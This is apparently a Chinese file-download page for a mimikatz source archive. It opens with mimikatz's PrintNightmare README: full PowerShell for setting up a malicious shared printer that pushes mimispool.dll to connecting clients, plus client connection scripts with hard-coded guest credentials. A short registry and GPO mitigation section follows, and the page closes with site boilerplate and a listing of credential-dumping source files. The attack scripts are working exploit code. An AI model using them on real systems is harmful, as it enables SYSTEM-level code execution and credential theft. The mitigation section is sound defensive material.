## PowerShell commands
### Server
#### install
```
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip'
Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk'
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
```
#### uninstall
```
$printerName = 'Kiwi Legit Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
Remove-Printer -Name $printerName
Start-Sleep -Seconds 2
Remove-PrinterDriver -Name 'Generic / Text Only'
Remove-Item -Force -Path ($drivers + '\x64\3\mimispool.dll')
Remove-Item -Force -Path ($drivers + '\W32X86\3\mimispool.dll')
Remove-Item -Force -Path ($system32 + '\mimispool.dll')
```
### Client
#### Any computer with explicit credential to `printnightmare.gentilkiwi.com`
```
$serverName = 'printnightmare.gentilkiwi.com'
$username = 'gentilguest'
$password = 'password'
$printerName = 'Kiwi Legit Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName
$credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force)))
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null
Add-Printer -ConnectionName $fullprinterName
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
Remove-PSDrive -Force -Name 'KiwiLegitPrintServer'
# mimispool still in spool\drivers
```
#### Computer in domain (single sign on with current user to print server)
```
$serverName = 'print.lab.local'
$printerName = 'Kiwi Legit Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
$driver = (Get-Printer -Name $fullprinterName).DriverName
Remove-Printer -Name $fullprinterName
Remove-PrinterDriver -Name $driver
# mimispool still in spool\drivers
```
## Protect
_to adapt to your environment_
**Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings**
### Registry
#### `.reg` file
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"1"="/your really legit servers or invalid entry !/"
```
#### commands
```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
```
### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers
#### `.reg` file
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint]
"PackagePointAndPrintOnly"=dword:00000001
"PackagePointAndPrintServerList"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers]
"srv1.fqdn"="srv1.fqdn"
"srv2.fqdn"="srv2.fqdn"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint]
"RestrictDriverInstallationToAdministrators"=dword:00000000
```
#### commands
```
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn"
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0
```
### GPO / Local
In `Computer Configuration`, `Administrative Templates`, `Printers`, enable:
- `Only use Package Point and Print`
- `Package Point and Print - Approved servers`
![image](https://user-images.githubusercontent.com/2307945/129240741-b2a0ba14-6858-4c3f-ad07-07fa55efca29.png)
### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers
Same configuration as previously - _with real printer server names this time_ - but do not forget to add registry key `RestrictDriverInstallationToAdministrators` to `0`
![image](https://user-images.githubusercontent.com/2307945/133833820-a66b3ffd-a3aa-43a2-a1bf-14581a2a7492.png)
没有合适的资源?快使用搜索试试~ 我知道了~
一个玩转Windows安全的小工具___下载.zip
共362个文件
h:166个
c:139个
lib:26个
1.该资源内容由用户上传,如若侵权请联系客服进行举报
2.虚拟产品一经售出概不退款(资源遇到问题,请及时私信上传者)
2.虚拟产品一经售出概不退款(资源遇到问题,请及时私信上传者)
版权申诉
0 下载量 96 浏览量
2023-04-19
00:50:18
上传
评论
收藏 2.92MB ZIP 举报
温馨提示
一个玩转Windows安全的小工具___下载.zip
资源推荐
资源详情
资源评论
收起资源包目录
一个玩转Windows安全的小工具___下载.zip (362个子文件)
sqlite3.c 7.58MB
kuhl_m_lsadump_dc.c 121KB
kuhl_m_lsadump.c 108KB
kuhl_m_misc.c 86KB
kuhl_m_sekurlsa.c 64KB
kuhl_m_crypto.c 54KB
kull_m_crypto.c 49KB
kull_m_dpapi.c 47KB
kull_m_rpc_ms-drsr_c.c 44KB
kuhl_m_sekurlsa_kerberos.c 42KB
kuhl_m_kerberos.c 40KB
kuhl_m_crypto_extractor.c 38KB
kkll_m_notify.c 37KB
kwindbg.c 34KB
kuhl_m_net.c 32KB
kuhl_m_dpapi.c 30KB
kull_m_process.c 28KB
kull_m_cred.c 27KB
kuhl_m_vault.c 26KB
kull_m_rpc_drsr.c 26KB
kuhl_m_ngc.c 25KB
kuhl_m_crypto_pki.c 25KB
kuhl_m_ts.c 23KB
kull_m_rpc_ms-odj.c 23KB
kull_m_rpc_ms-rprn.c 23KB
kull_m_rpc_ms-par_c.c 22KB
kuhl_m_dpapi_oe.c 21KB
kull_m_registry.c 19KB
kuhl_m_sr98.c 19KB
kuhl_m_sekurlsa_packages.c 19KB
kull_m_string.c 19KB
kuhl_m_kerberos_pac.c 19KB
kuhl_m_rpc.c 17KB
mimilove.c 17KB
kuhl_m_crypto_sc.c 16KB
kuhl_m_sekurlsa_nt5.c 16KB
kull_m_key.c 16KB
kull_m_rpc.c 15KB
kull_m_memory.c 15KB
kuhl_m_kerberos_ticket.c 15KB
kuhl_m_dpapi_cloudap.c 14KB
kuhl_m_sid.c 13KB
kuhl_m_misc_djoin.c 13KB
kuhl_m_crypto_patch.c 13KB
kull_m_busylight.c 12KB
kuhl_m_process.c 12KB
kuhl_m_minesweeper.c 11KB
kuhl_m_sekurlsa_nt6.c 11KB
kuhl_m_token.c 11KB
kull_m_crypto_ngc.c 11KB
kuhl_m_iis.c 11KB
kkll_m_process.c 11KB
kuhl_m_dpapi_chrome.c 11KB
kuhl_m_kernel.c 10KB
kuhl_m_dpapi_ssh.c 10KB
kuhl_m_sekurlsa_utils.c 10KB
kull_m_rpc_ms-nrpc_c.c 10KB
kull_m_rpc_ms-pac.c 10KB
kull_m_rpc_mimicom.c 10KB
kuhl_m_event.c 10KB
kuhl_m_dpapi_keys.c 10KB
kuhl_m_sekurlsa_msv1_0.c 9KB
kull_m_pn532.c 9KB
kull_m_rpc_ms-credentialkeys.c 9KB
kuhl_m_standard.c 9KB
kull_m_rdm.c 9KB
kull_m_sr98.c 8KB
kuhl_m_dpapi_creds.c 8KB
kcredentialprovider.c 8KB
mimikatz.c 8KB
kull_m_token.c 8KB
kull_m_rpc_ms-claims.c 8KB
kuhl_m_kerberos_ccache.c 8KB
kuhl_m_busylight.c 8KB
kuhl_m_sekurlsa_sk.c 8KB
kull_m_remotelib.c 8KB
kull_m_rpc_ms-efsr_c.c 7KB
kuhl_m_sysenvvalue.c 7KB
kkll_m_filters.c 7KB
mimidrv.c 7KB
kuhl_m_dpapi_lunahsm.c 7KB
kuhl_m_sekurlsa_utils.c 7KB
kull_m_cabinet.c 6KB
kull_m_service.c 6KB
kull_m_file.c 6KB
kull_m_rpc_dpapi-entries.c 6KB
kuhl_m_kerberos_claims.c 6KB
kuhl_m_service.c 6KB
kull_m_crypto_sk.c 6KB
kuhl_m_dpapi_rdg.c 6KB
kuhl_m_service_remote.c 6KB
kuhl_m_sekurlsa_dpapi.c 6KB
kuhl_m_misc_citrix.c 6KB
kull_m_rpc_ms-bkrp_c.c 5KB
kuhl_m_dpapi_sccm.c 5KB
kuhl_m_lsadump_remote.c 5KB
kull_m_minidump.c 5KB
kuhl_m_sekurlsa_nt6.c 5KB
kuhl_m_sekurlsa_cloudap.c 5KB
kull_m_patch.c 5KB
共 362 条
- 1
- 2
- 3
- 4
资源评论
快撑死的鱼
- 粉丝: 1w+
- 资源: 9154
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功